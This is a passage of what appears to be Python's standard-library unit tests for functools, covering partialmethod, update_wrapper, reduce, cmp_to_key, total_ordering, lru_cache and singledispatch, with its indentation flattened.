self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce(unittest.TestCase):
func = functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
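# n worker threads each call f() m times with a distinct first argument, so an
# uncontended cache ends up with n misses and m*n - n hits (asserted below for
# the C implementation)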
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can these counts be unequal for the pure-Python implementation?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
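# dispatch follows each class's MRO: C falls back to the A implementation, while
# D(C, B) picks the B implementation because B precedes A in D's MRO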
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
